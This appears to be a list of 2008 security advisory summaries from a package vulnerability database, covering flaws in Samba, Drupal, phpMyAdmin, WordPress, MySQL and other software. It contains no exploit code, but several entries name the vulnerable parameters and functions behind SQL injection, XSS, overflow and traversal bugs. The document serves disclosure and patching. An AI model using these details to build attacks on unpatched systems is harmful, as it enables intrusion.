| 2008-10-25 | Secunia reports: OpenX can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "bannerid" parameter in www/delivery/ac.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. more... | openx |
| 2008-10-25 | The Flyspray Project reports: Flyspray is affected by a Cross Site scripting Vulnerability due to an error escaping PHP's $_SERVER['QUERY_STRING'] superglobal, that can be maliciously used to inject arbitrary code into the savesearch() javascript function. There is an XSS problem in the history tab, the application fails to sanitize the "details" parameter correctly, leading to the possibility of arbitrary code injection into the getHistory() javascript function. Flyspray is affected by a Cross Site scripting Vulnerability due missing escaping of SQL error messages. By including HTML code in a query and at the same time causing it to fail by submitting invalid data, an XSS hole can be exploited. There is an XSS problem in the task history attached to comments, since the application fails to sanitize the old_value and new_value database fields for changed task summaries. Input passed via the "item_summary" parameter to "index.php?do=details" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | flyspray |
| 2008-10-24 | The Wordpress development team reports: A vulnerability in the Snoopy library was announced today. WordPress uses Snoopy to fetch the feeds shown in the Dashboard. Although this seems to be a low risk vulnerability for WordPress users, we wanted to get an update out immediately. more... | de-wordpress wordpress wordpress-mu |
| 2008-10-22 | The Drupal Project reports: On a server configured for IP-based virtual hosts, Drupal may be caused to include and execute specifically named files outside of its root directory. This bug affects both Drupal 5 and Drupal 6. The title of book pages is not always properly escaped, enabling users with the "create book content" permission or the permission to edit any node in the book hierarchy to insert arbitrary HTML and script code into pages. Such a Cross site scripting attack may lead to the attacker gaining administrator access. This bug affects Drupal 6. more... | drupal5 drupal6 |
| 2008-10-22 | The Wordpress development team reports: With open registration enabled, it is possible in WordPress versions 2.6.1 and earlier to craft a username such that it will allow resetting another users password to a randomly generated password. The randomly generated password is not disclosed to the attacker, so this problem by itself is annoying but not a security exploit. However, this attack coupled with a weakness in the random number seeding in mt_rand() could be used to predict the randomly generated password. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2008-10-20* | Secunia reports: Two vulnerabilities have been reported in Libxml2, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. 1) A recursion error exists when processing certain XML content. This can be exploited to e.g. exhaust all available memory and CPU resources by tricking an application using Libxml2 into processing specially crafted XML documents. 2) A boundary error in the processing of long XML entity names in parser.c can be exploited to cause a heap-based buffer overflow when specially crafted XML content is parsed. Successful exploitation may allow execution of arbitrary code. more... | libxml2 |
| 2008-10-19 | xine team reports: A new xine-lib version is now available. This release contains some security fixes, notably a DoS via corrupted Ogg files (CVE-2008-3231), some related fixes, and fixes for a few possible buffer overflows. more... | libxine |
| 2008-10-17 | Adobe Product Security Incident Response Team reports: Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. more... | linux-flashplugin |
| 2008-10-12 | The Drupal Project reports: A logic error in the core upload module validation allowed unprivileged users to attach files to content. Users can view files attached to content which they do not otherwise have access to. If the core upload module is not enabled, your site will not be affected. A deficiency in the user module allowed users who had been blocked by access rules to continue logging into the site under certain conditions. If you do not use the 'access rules' functionality in core, your site will not be affected. The BlogAPI module does not implement correct validation for certain content fields, allowing for values to be set for fields which would otherwise be inaccessible on an internal Drupal form. We have hardened these checks in BlogAPI module for this release, but the security team would like to re-iterate that the 'Administer content with BlogAPI' permission should only be given to trusted users. If the core BlogAPI module is not enabled, your site will not be affected. A weakness in the node module API allowed for node validation to be bypassed in certain circumstances for contributed modules implementing the API. Additional checks have been added to ensure that validation is performed in all cases. This vulnerability only affects sites using one of a very small number of contributed modules, all of which will continue to work correctly with the improved API. None of them were found vulnerable, so our correction is a preventative measure. more... | drupal5 drupal6 |
| 2008-10-10 | The release note of cups 1.3.9 reports: It contains the following fixes: SECURITY: The HP-GL/2 filter did not range check pen numbers (STR #2911) SECURITY: The SGI image file reader did not range check 16-bit run lengths (STR #2918) SECURITY: The text filter did not range check cpi, lpi, or column values (STR #2919) Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. more... | cups-base |
| 2008-10-10* | Thomas Henlich reports: The mysql command-line client does not quote HTML special characters like < in its output. This allows an attacker who is able to write data into a table to hide or modify records in the output, and to inject potentially dangerous code, e. g. Javascript to perform cross-site scripting or cross-site request forgery attacks. more... | mysql-client |
| 2008-10-10* | SecurityFocus reports: MySQL is prone to a security-bypass vulnerability. An attacker can exploit this issue to overwrite existing table files in the MySQL data directory, bypassing certain security restrictions. more... | mysql-server |
| 2008-10-03* | Secunia reports: Some security issues have been reported in BitlBee, which can be exploited by malicious people to bypass certain security restrictions and hijack accounts. The security issues are caused due to unspecified errors, which can be exploited to overwrite existing accounts. more... | bitlbee |
| 2008-10-03* | Secunia reports: The vulnerability is caused due to the application truncating an overly long FTP command, and improperly interpreting the remainder string as a new FTP command. This can be exploited to execute arbitrary FTP commands with the privileges of another user by e.g. tricking the user into following a malicious link. more... | proftpd proftpd-devel proftpd-mysql |
| 2008-10-03* | Secunia reports: An error exists in the "PMA_escapeJsString()" function in libraries/js_escape.lib.php, which can be exploited to bypass certain filters and execute arbitrary HTML and script code in a user's browser session in context of an affected site when e.g. Microsoft Internet Explorer is used. more... | phpMyAdmin |
| 2008-10-03* | Secunia reports: An error in the handing of ZIP archives with symbolic links can be exploited to disclose the contents of arbitrary files. Input from uploaded Flash animations is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed. more... | gallery gallery2 |
| 2008-10-03* | Secunia reports: Some vulnerabilities have been reported in various Horde products, which can be exploited by malicious people to conduct script insertion attacks. Input via MIME attachment linking is not properly sanitised in the MIME library before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session if e.g. a malicious email is viewed. Certain unspecified input in HTML messages is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script in a user's browser session if e.g. a malicious HTML email is viewed. more... | horde-base |
| 2008-10-03* | Secunia reports: Some vulnerabilities have been reported in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and disclose potentially sensitive information. Input passed to the username parameter in tiki-remind_password.php (when remind is set to send me my password) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code (for example with meta refreshes to a javascript: URL) in a user's browser session in context of an affected site. Input passed to the local_php and error_handler parameters in tiki-index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Input passed to the imp_language parameter in tiki-imexport_languages.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Certain img src elements are not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed. more... | tikiwik |
| 2008-10-03* | Secunia reports: The vulnerability is caused due to predictable DNS "Transaction ID" field in DNS queries and can be exploited to poison the DNS cache of an application using the library if a valid ID is guessed. more... | c-ares |
| 2008-10-02* | The oCERT team reports: The MPlayer multimedia player suffers from a vulnerability which could result in arbitrary code execution and at the least, in unexpected process termination. Three integer underflows located in the Real demuxer code can be used to exploit a heap overflow; a specific video file can be crafted in order to make the stream_read function read or write arbitrary amounts of memory. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-09-26* | Secunia Research reports: Secunia Research has discovered a vulnerability in Samba, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the "send_mailslot()" function. This can be exploited to cause a stack-based buffer overflow with zero bytes via a specially crafted "SAMLOGON" domain logon packet containing a username string placed at an odd offset followed by an overly long GETDC string. Successful exploitation allows execution of arbitrary code, but requires that the "domain logons" option is enabled. more... | ja-samba samba samba3 |
| 2008-09-26* | The Samba Team reports: Secunia Research reported a vulnerability that allows for the execution of arbitrary code in nmbd. This defect may only be exploited when the "wins support" parameter has been enabled in smb.conf. Samba developers have discovered what is believed to be a non-exploitable buffer overrun in nmbd during the processing of GETDC logon server requests. This code is only used when the Samba server is configured as a Primary or Backup Domain Controller. more... | ja-samba samba samba3 |
| 2008-09-26* | The Samba development team reports: The idmap_ad.so library provides an nss_info extension to Winbind for retrieving a user's home directory path, login shell and primary group id from an Active Directory domain controller. This functionality is enabled by defining the "winbind nss info" smb.conf option to either "sfu" or "rfc2307". Both the Windows "Identity Management for Unix" and "Services for Unix" MMC plug-ins allow a user to be assigned a primary group for Unix clients that differs from the user's Windows primary group. When the rfc2307 or sfu nss_info plugin has been enabled, in the absence of either the RFC2307 or SFU primary group attribute, Winbind will assign a primary group ID of 0 to the domain user queried using the getpwnam() C library call. more... | samba |
| 2008-09-26* | The Samba Team reports: A bug in the local SID/Name translation routines may potentially result in a user being able to issue SMB/CIFS protocol operations as root. When translating SIDs to/from names using Samba local list of user and group accounts, a logic error in the smbd daemon's internal security stack may result in a transition to the root user id rather than the non-root user. The user is then able to temporarily issue SMB/CIFS protocol operations as the root user. This window of opportunity may allow the attacker to establish additional means of gaining root access to the server. Various bugs in Samba's NDR parsing can allow a user to send specially crafted MS-RPC requests that will overwrite the heap space with user defined data. Unescaped user input parameters are passed as arguments to /bin/sh allowing for remote command execution. This bug was originally reported against the anonymous calls to the SamrChangePassword() MS-RPC function in combination with the "username map script" smb.conf option (which is not enabled by default). After further investigation by Samba developers, it was determined that the problem was much broader and impacts remote printer and file share management as well. The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking externals scripts defined in smb.conf. However, unlike the "username map script" vulnerability, the remote file and printer management scripts require an authenticated user session. more... | ja-samba samba |
| 2008-09-26* | Greg MacManus, iDEFENSE Labs reports: Remote exploitation of an integer overflow vulnerability in the smbd daemon included in Samba 2.0.x, Samba 2.2.x, and Samba 3.0.x prior to and including 3.0.9 could allow an attacker to cause controllable heap corruption, leading to execution of arbitrary commands with root privileges. Successful remote exploitation allows an attacker to gain root privileges on a vulnerable system. In order to exploit this vulnerability an attacker must possess credentials that allow access to a share on the Samba server. Unsuccessful exploitation attempts will cause the process serving the request to crash with signal 11, and may leave evidence of an attack in logs. more... | ja-samba samba |
| 2008-09-26* | Caused by improper bounds checking of certain trans2 requests, there is a possible buffer overrun in smbd. The attacker needs to be able to create files with very specific Unicode filenames on the share to take advantage of this issue. more... | samba |
| 2008-09-26* | Karol Wiesek at iDEFENSE reports: A remote attacker could cause an smbd process to consume abnormal amounts of system resources due to an input validation error when matching filenames containing wildcard characters. Although samba.org classifies this as a DoS vulnerability, several members of the security community believe it may be exploitable for arbitrary code execution. more... | samba |
| 2008-09-26* | According to a Samba Team security notice: A security vulnerability has been located in Samba 2.2.x more... | ja-samba samba |
| 2008-09-26* | Code found in nmbd and smbd may allow a remote attacker to effectively crash the nmbd server or use the smbd server to exhaust the system memory. more... | samba3 |
| 2008-09-26* | Evgeny Demidov discovered that the Samba server has a buffer overflow in the Samba Web Administration Tool (SWAT) on decoding Base64 data during HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are affected. Another buffer overflow bug has been found in the code used to support the "mangling method = hash" smb.conf option. The default setting for this parameter is "mangling method = hash2" and therefore not vulnerable. Versions between 2.2.0 through 2.2.9 and 3.0.0 through 3.0.4 are affected. more... | ja-samba samba |
| 2008-09-23 | Hanno Boeck reports: When configuring a web application to use only ssl (e.g. by forwarding all http-requests to https), a user would expect that sniffing and hijacking the session is impossible. Though, for this to be secure, one needs to set the session cookie to have the secure flag. Else the cookie will be transferred through http if the victim's browser does a single http-request on the same domain. Squirrelmail does not set that flag. It is fixed in the 1.5 test versions, but current 1.4.15 is vulnerable. more... | squirrelmail |
| 2008-09-17 | A phpMyAdmin security announcement: The server_databases.php script was vulnerable to an attack coming from a user who is already logged-on to phpMyAdmin, where he can execute shell code (if the PHP configuration permits commands like exec). more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement: A logged-in user, if abused into clicking a crafted link or loading an attack page, would create a database he did not intend to, or would change his connection character set. more... | phpMyAdmin |
| 2008-09-17* | Secunia reports: Some vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via unspecified parameters to files in /libraries is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation requires that "register_globals" is enabled and support for ".htaccess" files is disabled. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement reports: It is possible to read the contents of any file that the web server's user can access. The exact mechanism to achieve this won't be disclosed. If a user can upload on the same host where phpMyAdmin is running a PHP script that can read files with the rights of the web server's user, the current advisory does not describe an additional threat. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement reports: phpMyAdmin saves sensitive information like the MySQL username and password and the Blowfish secret key in session data, which might be unprotected on a shared host. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement reports: phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere. Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST, then COOKIE data. Mitigation factor: An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie. more... | phpMyAdmin |
| 2008-09-14 | Th1nk3r reports: The version of TWiki installed on the remote host allows access to the 'configure' script and fails to sanitize the 'image' parameter of that script of directory traversal sequences before returning the file contents when the 'action' parameter is set to 'image'. An unauthenticated attacker can leverage this issue to view arbitrary files on the remote host subject to the privileges of the web server user id. more... | twiki |
| 2008-09-12 | Joe Orton reports: A NULL pointer deference in the Digest authentication support in neon versions 0.28.0 through 0.28.2 inclusive allows a malicious server to crash a client application, resulting in possible denial of service. more... | neon28 |
| 2008-09-12 | Hanno Boeck reports: A fuzzing test showed weakness in the chm parser of clamav, which can possibly be exploited. The clamav team has disabled the chm module in older versions though freshclam updates and has released 0.94 with a fixed parser. more... | clamav clamav-devel |
| 2008-09-10 | Secunia reports: Some vulnerabilities have been reported in Python, where some have unknown impact and others can potentially be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system. Various integer overflow errors exist in core modules e.g. stringobject, unicodeobject, bufferobject, longobject, tupleobject, stropmodule, gcmodule, mmapmodule. An integer overflow in the hashlib module can lead to unreliable cryptographic digest results. Integer overflow errors in the processing of unicode strings can be exploited to cause buffer overflows on 32-bit systems. An integer overflow exists in the PyOS_vsnprintf() function on architectures that do not have a "vsnprintf()" function. An integer underflow error in the PyOS_vsnprintf() function when passing zero-length strings can lead to memory corruption. more... | python23 python24 python25 |
| 2008-09-08* | Secunia reports: A vulnerability has been reported in Nagios, which can be exploited by malicious people to conduct cross-site scripting attacks. more... | nagios nagios-devel |
| 2008-09-04* | According to Maksymilian Arciemowicz research, it is possible to bypass security restrictions of safe_mode in various functions via directory traversal vulnerability. The attacker can use this attack to gain access to sensitive information. Functions utilizing expand_filepath() may be affected. It should be noted that this vulnerability is not considered to be serious by the FreeBSD Security Team, since safe_mode and open_basedir are insecure by design and should not be relied upon. more... | php5 |
| 2008-08-21 | Secunia reports: A vulnerability has been reported in GnuTLS, which can potentially be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a use-after-free error when an application calls "gnutls_handshake()" for an already valid session and can potentially be exploited, e.g. during re-handshakes. more... | gnutls |
| 2008-08-20* | Joomla project reports: A flaw in the reset token validation mechanism allows for non-validating tokens to be forged. This will allow an unauthenticated, unauthorized user to reset the password of the first enabled user (lowest id). Typically, this is an administrator user. Note that changing the first user's username may lessen the impact of this exploit (since the person who changed the password does not know the login associated with the new password). However, the only way to completely rectify the issue is to upgrade to 1.5.6 (or patch the /components/com_user/models/reset.php file). more... | joomla15 |
| 2008-08-19 | NASA Goddard Space Flight Center reports: The libraries for the scientific data file format, Common Data Format (CDF) version 3.2 and earlier, have the potential for a buffer overflow vulnerability when reading specially-crafted (invalid) CDF files. If successful, this could trigger execution of arbitrary code within the context of the CDF-reading program that could be exploited to compromise a system, or otherwise crash the program. While it's unlikely that you would open CDFs from untrusted sources, we recommend everyone upgrade to the latest CDF libraries on their systems, including the IDL and Matlab plugins. Most worrisome is any service that enables the general public to submit CDF files for processing. The vulnerability is in the CDF library routines not properly checking the length tags on a CDF file before copying data to a stack buffer. Exploitation requires the user to explicitly open a specially-crafted file. CDF users should not open files from untrusted third parties until the patch is applied (and continue then to exercise normal caution for files from untrusted third parties). more... | cdf3 |
| 2008-08-19* | A Bugzilla Security Advisory reports: When importing bugs using importxml.pl, the --attach_path option can be specified, pointing to the directory where attachments to import are stored. If the XML file being read by importxml.pl contains a malicious ../relative_path/to/local_file node, the script follows this relative path and attaches the local file pointed by it to the bug, making the file public. The security fix makes sure the relative path is always ignored. more... | bugzilla ja-bugzilla |
| 2008-08-18 | The Drupal Project reports: A bug in the output filter employed by Drupal makes it possible for malicious users to insert script code into pages (cross site scripting or XSS). A bug in the private filesystem trusts the MIME type sent by the browser, enabling malicious users with the ability to upload files to execute cross site scripting attacks. The BlogAPI module does not validate the extension of uploaded files, enabling users with the "administer content with blog api" permission to upload harmful files. This bug affects both Drupal 5.x and 6.x. Drupal forms contain a token to protect against cross site request forgeries (CSRF). The token may not be validated properly for cached forms and forms containing AHAH elements. This bug affects Drupal 6.x. User access rules can be added or deleted upon accessing a properly formatted URL, making such modifications vulnerable to cross site request forgeries (CSRF). This may lead to unintended addition or deletion of an access rule when a sufficiently privileged user visits a page or site created by a malicious person. This bug affects both Drupal 5.x and 6.x. The Upload module in Drupal 6 contains privilege escalation vulnerabilities for users with the "upload files" permission. This can lead to users being able to edit nodes which they are normally not allowed to, delete any file to which the webserver has sufficient rights, and download attachments of nodes to which they have no access. Harmful files may also be uploaded via cross site request forgeries (CSRF). These bugs affect Drupal 6.x. more... | drupal5 drupal6 |
| 2008-08-07 | James Yonan reports: Security Fix - affects non-Windows OpenVPN clients running OpenVPN 2.1-beta14 through 2.1-rc8 (OpenVPN 2.0.x clients are NOT vulnerable nor are any versions of the OpenVPN server vulnerable). An OpenVPN client connecting to a malicious or compromised server could potentially receive an "lladdr" or "iproute" configuration directive from the server which could cause arbitrary code execution on the client. A successful attack requires that (a) the client has agreed to allow the server to push configuration directives to it by including "pull" or the macro "client" in its configuration file, (b) the client successfully authenticates the server, (c) the server is malicious or has been compromised and is under the control of the attacker, and (d) the client is running a non-Windows OS. more... | openvpn-devel |
| 2008-08-04* | A KDE Security Advisory reports: Kommander executes without user confirmation data files from possibly untrusted locations. As they contain scripts, the user might accidentally run arbitrary code. Impact: Remotely supplied kommander files from untrusted sources are executed without confirmation. more... | kdewebdev |
| 2008-07-13 | The Drupal Project reports: Free tagging taxonomy terms can be used to insert arbitrary script and HTML code (cross site scripting or XSS) on node preview pages. A successful exploit requires that the victim selects a term containing script code and chooses to preview the node. This issue affects Drupal 6.x only. Some values from OpenID providers are output without being properly escaped, allowing malicious providers to insert arbitrary script and HTML code (XSS) into user pages. This issue affects Drupal 6.x only. filter_xss_admin() has been hardened to prevent use of the object HTML tag in administrator input. Translated strings (5.x, 6.x) and OpenID identities (6.x) are immediately deleted upon accessing a properly formatted URL, making such deletion vulnerable to cross site request forgeries (CSRF). This may lead to unintended deletion of translated strings or OpenID identities when a sufficiently privileged user visits a page or site created by a malicious person. When contributed modules such as Workflow NG terminate the current request during a login event, user module is not able to regenerate the user's session. This may lead to a session fixation attack, when a malicious user is able to control another user's initial session ID. As the session is not regenerated, the malicious user may use the 'fixed' session ID after the victim authenticates and will have the same access. This issue affects both Drupal 5 and Drupal 6. Schema API uses an inappropriate placeholder for 'numeric' fields enabling SQL injection when user-supplied data is used for such fields. This issue affects Drupal 6 only. more... | drupal5 drupal6 |
| 2008-07-09 | Felipe Andres Manzano reports: The libpoppler pdf rendering library can free uninitialized pointers, leading to arbitrary code execution. This vulnerability results from memory management bugs in the Page class constructor/destructor. more... | poppler |
| 2008-07-04 | Pylons team reports: The error.py controller uses paste.fileapp to serve the static resources to the browser. The default error.py controller uses os.path.join to combine the id from Routes with the media path. Routes prior to 1.8 double unquoted the PATH_INFO, resulting in FileApp returning files from the filesystem that can be outside of the intended media path directory. An attacker can craft URLs which utilize the double escaping to pass in a name to the error.py controller which contains a leading slash, thus escaping the intended media path and serving files from any location on the filesystem that the Pylons application has access to. more... | py24-pylons |
| 2008-07-03 | Secunia reports: An integer overflow error exists in the processing of PFB font files. This can be exploited to cause a heap-based buffer overflow via a PFB file containing a specially crafted "Private" dictionary table. An error in the processing of PFB font files can be exploited to trigger the "free()" of memory areas that are not allocated on the heap. An off-by-one error exists in the processing of PFB font files. This can be exploited to cause a one-byte heap-based buffer overflow via a specially crafted PFB file. An off-by-one error exists in the implementation of the "SHC" instruction while processing TTF files. This can be exploited to cause a one-byte heap-based buffer overflow via a specially crafted TTF file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. more... | freetype2 |
| 2008-07-01 | Matthias Andree reports: 2008-06-24 1.2 also fixed issue in report_complete (reported by Petr Uzel) more... | fetchmail |
| 2008-06-28* | The Squid-2.5 patches page notes: If a certain malformed SNMP request is received squid restarts with a Segmentation Fault error. This only affects squid installations where SNMP is explicitly enabled via "make config". As a workaround, SNMP can be disabled by defining "snmp_port 0" in squid.conf. Squid security advisory SQUID-2008:1 explains that Squid-3 versions up to and including Squid-3.0.STABLE6 are affected by this error, too. more... | squid |
| 2008-06-24 | Apache HTTP server project reports: The following potential security flaws are addressed: CVE-2008-2364: mod_proxy_http: Better handling of excessive interim responses from origin server to prevent potential denial of service and high memory usage. Reported by Ryujiro Shibuya. CVE-2007-6420: mod_proxy_balancer: Prevent CSRF attacks against the balancer-manager interface more... | apache |
| 2008-06-21 | Rdancer.org reports: Improper quoting in some parts of Vim written in the Vim Script can lead to arbitrary code execution upon opening a crafted file. more... | vim vim-lite vim-ruby vim6 vim6-ruby |
| 2008-06-21 | The official ruby site reports: Multiple vulnerabilities in Ruby may lead to a denial of service (DoS) condition or allow execution of arbitrary code. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2008-06-21* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2007-25 XPCNativeWrapper pollution MFSA 2007-24 Unauthorized access to wyciwyg:// documents MFSA 2007-21 Privilege escalation using an event handler attached to an element not in the document MFSA 2007-20 Frame spoofing while window is loading MFSA 2007-19 XSS using addEventListener and setTimeout MFSA 2007-18 Crashes with evidence of memory corruption more... | firefox firefox-ja linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2008-06-20 | Matthias Andree reports: Gunter Nau reported fetchmail crashing on some messages; further debugging by Petr Uzel and Petr Cerny at Novell/SUSE Czech Republic dug up that this happened when fetchmail was trying to print, in -v -v verbose level, headers exceeding 2048 bytes. In this situation, fetchmail would resize the buffer and fill in further parts of the message, but forget to reinitialize its va_list typed source pointer, thus reading data from a garbage address found on the stack at addresses above the function arguments the caller passed in; usually that would be the caller's stack frame. more... | fetchmail |
| 2008-06-15 | Matthieu Herrb of X.Org reports: Several vulnerabilities have been found in the server-side code of some extensions in the X Window System. Improper validation of client-provided data can cause data corruption. Exploiting these overflows will crash the X server or, under certain circumstances, allow the execution of arbitrary machine code. When the X server is running with root privileges (which is the case for the Xorg server and for most kdrive based servers), these vulnerabilities can thus also be used to raise privileges. All these vulnerabilities, to be exploited successfully, require either an already established connection to a running X server (and normally running X servers are only accepting authenticated connections), or a shell access with a valid user on the machine where the vulnerable server is installed. more... | xorg-server |
| 2008-06-15* | MoinMoin team reports: A check in the userform processing was not working as expected and could be abused for ACL and superuser privilege escalation. more... | moinmoin |
| 2008-06-13 | Secunia reports: A vulnerability has been reported in the Courier Authentication Library, which can be exploited by malicious people to conduct SQL injection attacks. Input passed via e.g. the username to the library is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and e.g. potentially bypass authentication. Successful exploitation requires that a MySQL database is used for authentication and that a Non-Latin character set is selected. more... | courier-authlib |
| 2008-06-01 | The ikiwiki development team reports: Until version 2.48, ikiwiki stored passwords in cleartext in the userdb. That risks exposing all users' passwords if the file is somehow exposed. To pre-emptively guard against that, current versions of ikiwiki store password hashes (using Eksblowfish). more... | ikiwiki |
| 2008-05-31 | The ikiwiki development team reports: This hole allowed ikiwiki to accept logins using empty passwords to openid accounts that didn't use a password. Upgrading to a non-vulnerable ikiwiki version immediately is recommended if your wiki allows both password and openid logins. more... | ikiwiki |
| 2008-05-30 | Adobe Product Security Incident Response Team reports: An exploit appears to be taking advantage of a known vulnerability, reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash Player 9.0.124.0 (CVE-2007-0071). This exploit does NOT appear to include a new, unpatched vulnerability as has been reported elsewhere - customers with Flash Player 9.0.124.0 should not be vulnerable to this exploit. more... | linux-flashplugin |
| 2008-05-27 | Spamdyke Team reports: Fixed smtp_filter() to reject the DATA command if no valid recipients have been specified. Otherwise, a specific scenario could result in every spamdyke installation being used as an open relay. If the remote server connects and gives one or more recipients that are rejected (for relaying or blacklisting), then gives the DATA command, spamdyke will ignore all other commands, assuming that message data is being transmitted. However, because all of the recipients were rejected, qmail will reject the DATA command. From that point on, the remote server can give as many recipients as it likes and spamdyke will ignore them all -- they will not be filtered at all. After that, the remote server can give the DATA command and send the actual message data. Because spamdyke is controlling relaying, the RELAYCLIENT environment variable is set and qmail won't check for relaying either. Thanks to Mirko Buffoni for reporting this one. more... | spamdyke |
| 2008-05-21 | Nico Golde discovered that PeerCast, a P2P audio and video streaming server, is vulnerable to a buffer overflow in the HTTP Basic Authentication code, allowing a remote attacker to crash PeerCast or execute arbitrary code. more... | peercast |
| 2008-05-17 | Red Hat reports: Will Drewry of the Google Security Team reported several flaws in the way libvorbis processed audio data. An attacker could create a carefully crafted [Vorbis] audio file in such a way that it could cause an application linked with libvorbis to crash, or execute arbitrary code when it was opened. more... | libvorbis |
| 2008-05-14 | Django project reports: The Django administration application will, when accessed by a user who is not sufficiently authenticated, display a login form and ask the user to provide the necessary credentials before displaying the requested page. This form will be submitted to the URL the user attempted to access, by supplying the current request path as the value of the form's "action" attribute. The value of the request path was not being escaped, creating an opportunity for a cross-site scripting (XSS) attack by leading a user to a URL which contained URL-encoded HTML and/or JavaScript in the request path. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel |
| 2008-05-11 | Secunia reports: A vulnerability has been reported in vorbis-tools, which can potentially be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an input validation error when processing Speex headers, which can be exploited via a specially crafted Speex stream containing a negative "modeID" field in the header. Successful exploitation may allow execution of arbitrary code. more... | vorbis-tools |
| 2008-05-08 | Secunia reports: A vulnerability has been reported in QEMU, which can be exploited by malicious, local users to bypass certain security restrictions. The vulnerability is caused due to the "drive_init()" function in vl.c determining the format of a disk from data contained in the disk's header. This can be exploited by a malicious user in a guest system to e.g. read arbitrary files on the host by writing a fake header to a raw formatted disk image. more... | qemu qemu-devel |
| 2008-05-07 | Secunia reports: A vulnerability has been reported in swfdec, which can be exploited by malicious people to disclose sensitive information. The vulnerability is caused due to swfdec not properly restricting untrusted sandboxes from reading local files, which can be exploited to disclose the content of arbitrary local files by e.g. tricking a user into visiting a malicious website. more... | swfdec |
| 2008-05-02 | FrSIRT reports: A vulnerability has been identified in mt-daapd which could be exploited by remote attackers to cause a denial of service or compromise an affected system. This issue is caused by a buffer overflow error in the ws_getpostvars() function when processing a negative Content-Length: header value, which could be exploited by remote unauthenticated attackers to crash an affected application or execute arbitrary code. more... | mt-daapd |
| 2008-05-02 | Secunia reports: Two vulnerabilities have been reported in SDL_image, which can be exploited by malicious people to cause a Denial of Service or potentially compromise an application using the library. A boundary error within the LWZReadByte() function in IMG_gif.c can be exploited to trigger the overflow of a static buffer via a specially crafted GIF file. A boundary error within the "IMG_LoadLBM_RW()" function in IMG_lbm.c can be exploited to cause a heap-based buffer overflow via a specially crafted IFF ILBM file. more... | sdl_image |
| 2008-05-02* | CVE reports: Integer overflow in PHP 5.2.5 and earlier allows context-dependent attackers to cause a denial of service and possibly have unspecified other impact via a printf format parameter with a large width specifier, related to the php_sprintf_appendstring function in formatted_print.c and probably other functions for formatted strings (aka *printf functions). more... | php5 |
| 2008-04-29* | Secunia reports: A vulnerability has been reported in GnuPG, which can potentially be exploited to compromise a vulnerable system. The vulnerability is caused due to an error when importing keys with duplicated IDs. This can be exploited to cause a memory corruption when importing keys via --refresh-keys or --import. Successful exploitation potentially allows execution of arbitrary code, but has not been proven yet. more... | gnupg |
| 2008-04-29* | Secunia reports: Tavis Ormandy has reported a vulnerability in libpng, which can be exploited by malicious people to cause a Denial of Service, disclose potentially sensitive information, or potentially compromise an application using the library. The vulnerability is caused due to the improper handling of PNG chunks unknown to the library. This can be exploited to trigger the use of uninitialized memory in e.g. a free() call via unknown PNG chunks having a length of zero. Successful exploitation may allow execution of arbitrary code, but requires that the application calls the png_set_read_user_chunk_fn() function or the png_set_keep_unknown_chunks() function under specific conditions. more... | png |
| 2008-04-28* | Justin Ferguson reports: Integer signedness error in the zlib extension module in Python 2.5.2 and earlier allows remote attackers to execute arbitrary code via a negative signed integer, which triggers insufficient memory allocation and a buffer overflow. more... | python23 python24 python25 |
| 2008-04-25 | Extmail team reports: Emergency update #4 fixes a serious security vulnerability. Successful exploit of this vulnerability would allow attacker to change user's password without knowing it by using specifically crafted HTTP request. more... | extman |
